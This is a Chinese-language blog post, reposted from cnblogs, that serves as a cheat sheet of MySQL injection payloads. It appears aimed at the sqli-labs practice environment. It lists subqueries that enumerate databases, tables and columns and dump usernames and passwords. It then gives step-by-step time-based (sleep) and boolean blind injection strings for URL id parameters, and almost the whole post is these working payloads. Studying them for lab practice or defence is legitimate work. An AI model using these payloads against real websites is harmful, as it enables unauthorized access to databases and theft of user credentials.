码迷,mamicode.com
首页 > 数据库 > 详细

mysql注入语句

时间:2019-07-24 13:35:33      阅读:170      评论:0      收藏:0      [点我收藏+]

标签:有用   inf   时间   手工   mat   pre   增加   data   注意   

一、sql注入语句

爆破所有数据库:

(select group_concat(schema_name) from information_schema.schemata)

获取数据库所有表:

(select  group_concat(table_name) from information_schema.tables where table_schema='mysql')

获取所有列名:

(select group_concat(column_name) from information_schema.columns where table_name='users')

获取所有用户密码:

(select group_concat(password) from security.users)
(select group_concat(username) from security.users)

盲注

方法一:时间延迟型手工注入

1.爆库长

?id=1' and if(length(database())=8,sleep(5),1)--+ 

明显延迟,数据库长度为8.

2.爆库名

?id=1' and if(left(database(),1)='s' ,sleep(5),1) --+
?id=1' and if(left(database(),8)='security' ,sleep(5),1) --+

明显延迟,数据库第一个字符为s,加下来以此增加left(database(),字符长度)中的字符长度,等号右边以此爆破下一个字符,正确匹配时会延迟。最终爆破得到left(database(),8)=‘security‘

3.爆表名

?id=1' and if( left((select table_name from information_schema.tables where table_schema=database() limit 3,1),1)='u' ,sleep(5),1) --+
?id=1' and if( left((select table_name from information_schema.tables where table_schema=database() limit 3,2),1)='us' ,sleep(5),1) --+
?id=1' and if( left((select table_name from information_schema.tables where table_schema=database() limit 3,5),1)='users' ,sleep(5),1) --+

4.爆列名

?id=1' and if(left((select column_name from information_schema.columns where table_name='users' limit 4,1),8)='password' ,sleep(5),1)--+

5.爆用户和密码

?id=1' and if(left((select username from users order by id limit 0,1),4)='dumb' ,sleep(5),1)--+
?id=1' and if(left((select password from users order by id limit 0,1),4)='dumb' ,sleep(5),1)--+

注意:limit 按照id排序,limit 从0开始.

方法二,布尔型手工注入

在布尔型注入中,正确会回显,错误没有回显

1.爆库名

id=1' and length(database())=8--+
?id=' and left((select database()),1)='s' --+
?id=' and left((select database()),2)='se' --+

2.爆表名

?id=1' and left((select table_name from information_schema.tables where table_schema=database() limit 1,1),1)='r' --+

3.爆列名

?id=1'and left((select column_name from information_schema.columns  where table_name='users'limit 2,1 ),8)='password' --+

4.爆用户和密码

?id=1' and left((select username from users order by id limit 0,1),1)='d' --+
?id=1' and left((select password from users order by id limit 0,1),1)='d' --+

mysql注入语句

标签:有用   inf   时间   手工   mat   pre   增加   data   注意   

原文地址:https://www.cnblogs.com/dyanbk/p/11237140.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!